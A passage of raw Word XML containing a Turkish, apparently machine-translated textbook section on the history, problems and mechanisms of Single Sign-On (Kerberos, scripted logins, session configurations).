        <w:t>Her yerdeki şirketler ana bilgisayar merkezli veri işleme ortamından müşteri / sunucu yapılandırmasına işlevsel geçiş yaptılar. Bu dönüşümle birlikte yeni ekonomiler, daha çeşitli operasyonel seçenekler ve yeni bir dizi zorluk ortaya çıktı. Ana bilgisayar merkezli kurulumda, sistem yönetimi genellikle bilgisayar kompleksinin kendisinin idari ikizi idi: sistemin bileşenleri, sistemin yönetimini yapanlar gibi bir alana bağlandı. Dağıtılmış istemci / sunucu düzenlemesinde, sistemleri yönetenler yine benzer bir şekilde düzenlenir. Bu dağıtılmış altyapının, karmaşık işlemlerde basit bir günlük tutma eylemini gerçekleştirmesine rağmen, karmaşık işlemleri vardır. Kullanıcıların, çalışmalarını gerçekleştirmek için birçok farklı sisteme ve uygulamaya erişmeleri gerekir. Bunları basit ve kolay bir şekilde yapmalarını sağlamak, zaman alıcıdır ve birden fazla sistemdeki birkaç kişi arasında koordinasyon gerektirir. Ana bilgisayar ortamında, bu sistemler ve uygulamalar arasında geçiş yapmak, ana menüye dönmek ve yeni bir seçim yapmak anlamına geliyordu. İstemci / sunucu dünyasında bu tamamen farklı bir sisteme giriş yapmak anlamına gelebilir. Yeni oturum açma, yeni şifre ve önceki sistem için kullanılanlardan her ikisi de büyük olasılıkla farklıdır - kullanıcı bunlarla doludur ve başarısız oturum açma girişimlerini önlemek için kafalarını karıştırmama sorunu. Bu ve bununla ilgili problemlerden dolayı Tek SignOn veya SSO kavramının doğması gerekiyordu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc9978707"/>
      <w:bookmarkStart w:id="63" w:name="_Toc9979189"/>
      <w:r w:rsidRPr="00467D8D">
        <w:t>2.1. Evrim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hesaplama platformlarının, işletim sistemlerinin ve erişim kontrol yazılımlarının (ve bunlarla birlikte gelen birçok giriş ve şifrenin) çeşitliliği göz önüne alındığında, bir defada ve aynı anda tek bir işlemle birden fazla sistemde oturum açma kabiliyetine sahip olmak, bir duanın yanıtını verir . Böyle bir dua, kullanıcılar tarafından sunulan ve her yerde erişim kontrol yöneticileridir. Kavramı, bunu başarmak için bir yöntem ortaya çıktığında, onu farklı sistem erişim kontrol biçimleriyle bütünleştirmenin birçok engelde göz korkutucu bir meydan okumaya yol açacağı açıkça ortaya çıktı. Uygulama yazılımının ana bilgisayarın ilk günleri gibi tek bir platformda çalıştığı günlerde, varsayılan olarak kullanıcıların gerçekleştirmesi gereken tek bir oturum açma vardı. Uygulamanın parti odaklı veya etkileşimli olmasına rağmen, kullanıcının hatırlaması gereken yalnızca bir giriş ve şifre kombinasyonu vardı. Parola değiştirme zamanı geldiğinde, kullanıcı sıklıkla kendi ifadesini oluşturabilir. Karşılaşılan en kötü şey, sayı / harf kombinasyonları sunan bazı şirketler tarafından uygulanan rastgele şifre üreticisi yazılımıydı. O zaman bile, onlardan sadece biri vardı. Bir sonraki adım, aynı ağ üzerinde aynı türden birden fazla bilgisayarın eklenmesiydi. Bu makineler her zaman birbirleriyle iletişim kurmazken, kullanıcının tüm veri gereksinimlerini karşılamak için birden fazlasına erişmesi gerekiyordu. Aynı tipte bile olsa birden çok sistem farklı kullanım kurallarına sahipti. Veri işleme departmanındaki farklı gruplar genellikle bu farklı sistemleri kontrol eder ve bazen aynı şirketle organizasyonları tamamen ayırır. Tabii ki, her bir sistem aynı terminalden erişilebilir olmasına rağmen, her biri için farklı bir oturum açma ve parola olması gerekiyordu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sonra, “bölüm bilgisayarı” denildi. Bu daha küçük, daha az güçlü işlemciler, o bölüme özgü benzersiz uygulamalar yürütmek için şirketteki belirli gruplara hizmet etti. Örnekler arasında malzeme yönetimi, muhasebe ve finansman </w:t>
      </w:r>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>uygulamaları, merkezi kelime işlem ve işletme uygulamaları sayılabilir. Bu alanların kısıtlı ihtiyaçları ve sık sık kendi içlerinde elektronik olarak kendileri ile iletişim kurmaları, bu sistemleri aynı ağ üzerinde birbirine bağlamaları gerektiği için gereksizdi. Bu durum uzun sürmedi. Yakında bu sistemleri birbirine bağlamanın ve onların ağ üzerinden birbirleriyle iletişim kurmasına izin vermenin bir alandan diğerine bilgi akışını hızlandıracağı ortaya çıktı. Dahili posta yoluyla bir rapor almak için ayın son haftasına kadar beklemek yerine, satın alma kayıtları, satın alma işlemine gönderilen toplu raporlardan aynı hafta alınan malzemeler için stok kayıtları ile haftalık olarak birleştirilebilir. Bilgi akışındaki bu sonraki aşama da uzun sürmedi. Sistemler daha az, daha az parti odaklı ve daha etkileşimli hale geldikçe ve malların, hizmetlerin ve paraya bağlı hareketlerini kaydetmek için iş baskıları arttıkça, daha hızlı erişim talep edildi. Bir alandaki kullanıcıların diğerlerindeki bilgilere doğrudan erişmeleri gerekiyordu. Bu senaryoda tek bir sorun vardı - ve küçük bir problem değildi. Bilgisayarlar neredeyse her zaman ağırlıklı olarak iki farklı alana girmiştir: genel amaçlı makineler ve özel amaçlı makineler. Başlangıçta “iş işleme sistemleri” ve “bilimsel ve mühendislik sistemleri” olarak adlandırılan bu bilgisayarlar, bugün devam eden tek bir protokol ve tek işletim sisteminden ayrılmaya başladı. Tek bir kullanıcının her ikisine de erişebilmesi için, genellikle her biri farklı bir protokolde çalışan iki ayrı ağ gerekir. Elbette bu, kullanıcının masasındaki iki farklı terminal anlamına geliyordu. Tüm sistemlerin aynı üreticiden gelmesi önemli değildi: sistemler aynı tel veya iş istasyonunda birleştirilemedi. Evrimdeki bir sonraki aşama, çeşitli adaptörler, çoklu ekran “pencereli” ekranlar, protokol dönüştürücüler, vb. Takmaktı. Bu cihazlar bazen ikinci terminali elimine etti. Ardından şimdiki her yerde bulunan kişisel bilgisayar veya “PC”, 12 Ağustos 1981'de IBM tarafından tanıtıldığı zaman ilk çağrıldığı haliyle geldi. Birkaç yıl içinde, bu vazgeçilmez cihazın neredeyse her yerden bilgi bağlamasına ve görüntülemesine izin veren adaptörler ortaya çıktı. Her tür ana bilgisayar daha sonra hizmete girer. Başka bir nimettir son kullanıcıya çarptı! Bu evrim günümüze kadar devam etmiştir. Çoğu özel protokol, yünlü Mamut'un yolunda ilerlemiş ve neredeyse hepsi TCP / IP konuşan bir şekilde değerli bir azınlığa ulaşmıştır. Bu yakınsama son derece önemlidir: tüm bu farklı hesaplama platformlarını aynı kablo üzerinde ortak bir protokolle birbirine bağlamanın temel yöntemi mevcuttur. Microsoft Windows'un gelişi bu yakınsamayı bir adım daha ileriye itti. Protokollerin bir araya geldiği gibi, farklı bilgisayarlarla oturumları görüntüleme kabiliyeti de gerçekleşiyordu. Durumla birlikte, grafiksel kullanıcı arayüzü (“GUI” - aşırı duygusal ile aynı) farklı ana bilgisayarlardan eşzamanlı gösterimleri etkinleştirdi. Sanal bellek PC'de gerçek oldu mu, bu eşzamanlı aktif ekranlara ve işlemlere izin vererek hala bu zarfı itti. Kullanıcılar yıllarca istedikleri ve ihtiyaç duydukları yetenekleri alıyorlardı. Şimdi imkansız son tarihlere sahip imkansız görevler normal, hatta rutin hale getirildi. Ancak, kaydedilen tüm ilerlemelere rağmen, asıl mesele henüz ele alınmamıştı. Biçimlendirmeye uygun, kullanıcılar tüm yeni oyuncaklara ve söz verdikleri kullanım kolaylığına minnettarlardı… uyanıp bu yeniliklerin hiçbirinin en fazla ve en çok şikayet ettikleri şeyi, birden fazla logini ve şifreyi desteklemediğini tespit edene kadar. Peki, tek oturum açma nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc9978708"/>
      <w:bookmarkStart w:id="65" w:name="_Toc9979190"/>
      <w:r w:rsidRPr="00467D8D">
        <w:t>2.2. Tekli Oturum Açma Nedir: Başlangıç</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yaklaşık 50 yıl önce başlayan sistem tasarımcıları, bilgisayar sistemleriyle etkileşimin izlenmesi için bir yönteme ihtiyaç duyulduğunu fark ettiler ve bu nedenle bir kimlik belirleme şekli (loginid) tasarlandı. Neredeyse eşzamanlı </w:t>
      </w:r>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olarak bununla aynı anda parola geldi - bu bazen kullanıcının kimliğini doğrulayan ya da onaylayan oturum açma işlemine eşlik eder. Geçtiğimiz on yıllar boyunca, tek bir oturum açma ve ilgili şifre, kullanıcının kullanabileceği neredeyse tüm bilgi işlem gücüne ve kullanabileceği tüm uygulamalara ve sistemlere erişmesine yardımcı olmak için yeterliydi. Evet, o günlerdi… basit, anlaşılır ve yönetimi kolay. Ve şimdi hepsi bitti, tıpkı kulüp yosunu, vakum tüpü ve MS / DOS (belki) gibi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Günümüz ortamı hem coğrafya hem de platform açısından daha dağılmıştır. Bazıları tartışsa da, bir işletim sistemini diğerinden ayıran özellikler hem ağ erişimi hem de grafiksel kullanıcı arayüzleri (her yerde bulunan GUI) tarafından engelleniyor. Her geliştirici, kendi uygulamalarını her bilgisayar platformunda sunmayı seçmediğinden (ve ağlar bu çeşitlilikten habersiz göründüğü için gelişti), kullanıcılar artık daha fazla platforma yayılmış daha geniş bir araç yelpazesine erişebiliyor, daha fazlası Geçmişte herhangi bir zamanda şeffaf olarak. Ve yine de hepsi cennet değil. Bu güç ve fayda zenginliği ile birlikte öncekiyle aynı gereksinim gelir: kullanıcıyı tanımlamak ve doğrulamak. Fakat şimdi bu, tüm bu çeşitli sistemler ve platformlar arasında yapılmalıdır ve hepsinin bunu başarmak için farklı mekanizmaları vardır. Sonuçta, kullanıcılar artık her biri kendi benzersiz şifresiyle yönetilen ve muhtemelen de kendilerine özgü benzersiz kurallarla yönetilen birden fazla oturum açmaya sahip. CISSP, kullanıcıların bu durumdan acı bir şekilde şikayet ettiklerini biliyor ve genellikle ne gerekiyorsa onu atlatmaya çalışır. Bunu önlemek için CISSP bir çözüm bulmak zorundaydı. Bunu kolaylaştırmak ve bir pazarlama fırsatından yararlanmak için, yazılım satıcıları hayati bir ihtiyaç gördüler ve bu nedenle tek oturum açma (SSO) tasarlandı. Ek 7.1, göründüğü zaman genel güvenlik programında SSO'nun nerede bulunduğunu göstermektedir. Bir erişim kontrol yöntemi olarak, SSO birden fazla platformda (kullanıcı kimliği ve kimlik doğrulaması) önemli ihtiyaçları ele aldı. Genel olarak, genel bilgi koruma ve kontrol yapısına katkısı bakımından zor ve uygulanması zor olan ve şüpheli değeri olan bir "kullanıcı rahatlığı" olarak kabul edildi.</w:t>
      </w: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rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc9978709"/>
      <w:bookmarkStart w:id="67" w:name="_Toc9979191"/>
      <w:r w:rsidRPr="00467D8D">
        <w:t>2.3. Temel Sorun</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En basit ifadeyle, çok fazla giriş ve şifre ve diğer kullanıcı erişim yönetimi sorunlarının bir ana bilgisayarı. Çalışanların çalışmasını denetlemek için coğrafi olarak dağılmış bir matris yaklaşımı gerektiren karmaşık yönetim yapılarıyla, operasyonel hedefleri ve raporlama gereksinimlerini karşılamak için dağıtılmış ve çoğu zaman çok farklı sistemler gerekir. Büyük ölçüde anabilgisayar tabanlı sistemler günlerinde, bu tür bir sorun neredeyse yoktu. Standartlar yapıldı ve yaptırım karmaşık değildi. Bu günlerde, bu koşullar çeşitli sistem standartlarının oluşturulması ve uygulanması için aynı görevi yerine getirmektedir. Ancak şimdi, bu koşullar ve bunlarda ortaya çıkan sistemler, doğal olarak buna elverişli değillerdir. Yukarıda bahsedildiği gibi, bu tür sistemler kullanıcı aktivitesini izlemek için farklı yerleşik sistemlere sahiptir. Temel kavramlar benzer: Denetim izi, erişim kontrolü kural kümeleri, Erişim Kontrol Listeleri (ACL'ler), sistem ayrıcalık seviyelerini düzenleyen parametreler, vb. Sonunda, teoride sağlam olsa da, bir kural ve standart kümesinin ortaya çıkabileceği </w:t>
      </w:r>
      <w:r w:rsidRPr="00467D8D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>anlaşılıyor. Yönetilemez bir karmaşıklık oluşturmadan tüm platformlarda uygulama yapmak için fazlasıyla zor olun. Ancak, işletme seviyesindeki kullanıcı yöneticilerinin aradığı “Kutsal Kase” dir.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F3FD82" wp14:editId="2B510CD7">
            <wp:extent cx="5753100" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Resim 10" descr="C:\Users\90553\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53\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Ekran Alıntıs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E77DF4" w:rsidRPr="000D2EFB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu sorunun görünen basitliğine rağmen, kullanıcı yönetimi ile ilgili bir dizi sorunun sadece ucunu temsil ediyor. Bu tür sorunlar, kullanıcıların kaynaklara erişimini denetleme zorunluluğu getirildiği her yerde mevcuttur: yerel kurum içi, uzak WAN düğümleri, uzaktan içeri arama ve Web tabanlı erişim. Exhibit 7.1 ile karşılaştırıldığında Exhibit 7.2, SSO'nun daha fazla işlevselliğe sahip daha geniş kapsamlı bir ürüne nasıl geliştiğini göstermektedir. Sadece bir "kullanıcı rahatlığı" olarak kabul edildiğinde, SSO diğer geleneksel güvenlik ürünleri ve yetenekleriyle daha sıkı bir şekilde bütünleştirildi. Bu evrim, SSO’nun imajını ölçülebilir bir şekilde iyileştirdi, ancak uygulamasını basitleştirmedi. Yukarıda belirtilen soruna ek olarak, bu tür yeteneklere duyulan ihtiyaç, bazıları aşağıdakileri içeren çeşitli yollarla kendini gösterir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000D2EFB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giriş noktalarının sayısı arttıkça (İnternet dahil), geliştirilmiş ve denetlenebilir güvenlik kontrolleri uygulamasına ihtiyaç vardır. 2. Çok sayıda iş istasyonunun yönetimi, virüslerden kaçınmak, kullanıcı tarafından girilen sorunları sınırlamak, yardım masası kaynaklarını en aza indirmek, vb. İçin bazı kontrollerin yerleştirilmelerini zorunlu kılmaktadır. Son kullanıcıların elektronik masaüstlerine ulaşmak için çalışma yolları boyunca çeşitli iş istasyonlarını kullanabilmelerine ihtiyaç duyulmaktadır. 4. Uygulamaların çoğalması, şifreler otomatikleştirildikten sonra bile zor, çok hantal veya çok zaman alan tüm bilgilere ulaşılmasını sağlamıştır. 5. Güvenlik yönetimi, endüstri kurallarına uyumu arttırmak ve verimliliği artırmak için bir uygulama odağından küresel bir odağa geçmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc9978710"/>
      <w:bookmarkStart w:id="69" w:name="_Toc9979192"/>
      <w:r w:rsidRPr="000D2EFB">
        <w:t>2.4. Mekanizmalar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSO'yu uygulamak için kullanılan mekanizmalar zamanla değişmiştir. Bir yöntem Kerberos ürününü, kullanıcıları ve kaynakları bir “biletleme” sistemi aracılığıyla birbirlerine doğrulamak için kullanır; bunlar, sistemlere ve kaynaklara yetki verildiği araç olan biletlerdir. Diğer bir </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yöntem, kabuklar ve komut dosyaları olmuştur: kabukta birincil kimlik doğrulaması, daha sonra hedef platformlarda hesap ve kaynak erişimini etkinleştirmek için çeşitli platform spesifik komut dosyaları başlattı. Kerberos uygulamasına dahil olan zaman ve çabayı harcamak istemeyen kuruluşlar için, nihai çözüm, kabuk ve senaryo yaklaşımının bir çeşitlemesi olabilirdi. Bunun birkaç dezavantajı vardı. Her platformda ayrı ayrı kullanıcı hesapları kurma ihtiyacını ortadan kaldırmadı. Ayrıca parola senkronizasyonu veya diğer yönetim özelliklerini sağlamadı. Kabuk ve komut dosyası en iyi şekilde yarım adımdı ve kullanıcı oturumunu basitleştirmesine rağmen, bu kolaylaştırdığı otomasyonun kapsamıydı. “Öyleydi”. Bugün, bir SSO platformu uygulanırken farklı yapılandırma yaklaşımları ve seçenekleri mevcuttur ve önceki girişimlerin dezavantajları büyük ölçüde ele alınmıştır. Ne olursa olsun, güvenlik mühendisliği perspektifinden, uygulama planı için tasarım ve hedeflerin (yani, çözmeye çalıştığı sorun) bir risk analizinde değerlendirilmesi ve daha sonra garanti edildiği şekilde azaltılması gerekir. SGK durumunda, operasyonel endişeler aşağıda tartışıldığı gibi değerlendirilmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir uygulama şekli, kullanıcının oturumu kapatıncaya kadar yetkili kaynaklarının tümüne aktif olarak bağlı kalmasıyla sonuçlanan bir oturum açma oturumuna izin verir. Bu tür yapılandırma, zamana dayalı yeniden doğrulama yapılmasını sağlar (her… dakika veya saatte bir) veya olaya dayalı olabilir (yani, sistem sınır geçişi). Bu yapılandırma ile ilgili bir endişe kaynak kullanımıdır. Bunun nedeni, oturum açma sırasında birçok ağ trafiğinin üretilmesi, dizin / ACL erişimlerinin gerçekleştirilmesi ve birkaç uygulama / sistem oturumu kurulmasıdır. Bu aktivite seviyesi, özellikle birkaç kullanıcı aynı anda giriş yapma girişiminde bulunursa, genel sistem performansını önemli ölçüde azaltacaktır. Seans kaybının önlenmesi (etkin olma zaman aşımına uğraması nedeniyle), eğer özelliğin kendisi devre dışı bırakılamazsa, bunu önlemek için ara sıra "ping" yapılması gerekebilir. Bu da ek ağ trafiği olan kaynakları tüketir. Bu yaklaşımla ilgili diğer önemli endişe, kullanıcının belirli bir uygulamada aktif olup olmamasına bakılmaksızın “açık oturumların” mevcut olmasıdır. Bu, veri akışının istila edilmesi, nüfuz edilmesi veya yeniden yönlendirilmesi durumunda “oturum çalmayı” mümkün kılabilir. Başka bir potansiyel yapılandırma, şebeke servisine ilk tanımlamayı / doğrulamayı gerçekleştirir, ancak kullanıcı açıkça talep edene kadar belirli bir sisteme veya uygulamaya erişimi başlatmaz (yani ilgili masaüstü simgesine çift tıklayın). Bu ağ trafiği seviyesini düşürür ve yalnızca istendiğinde yeni oturumlar başlatır. Periyodik yeniden doğrulama hala geçerli olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc9978711"/>
      <w:bookmarkStart w:id="71" w:name="_Toc9979193"/>
      <w:r w:rsidRPr="000D2EFB">
        <w:t>2.5. Tekli Oturum Açma Ne Sağlar?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSO ürünleri, son uç nokta sistemlerinin merkezi yönetimini, son kullanıcıların büyük popülasyonlarının etkilenmesini sağlayan rol tabanlı bir bakış açısıyla yönetmeyi içeren daha karmaşık sorunlara basit son kullanıcı kimlik doğrulama ve parola yönetiminin ötesine geçmiştir. tek sistem yönetimi değişikliği (örneğin, tüm çalışanlara yeni bir uygulama </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
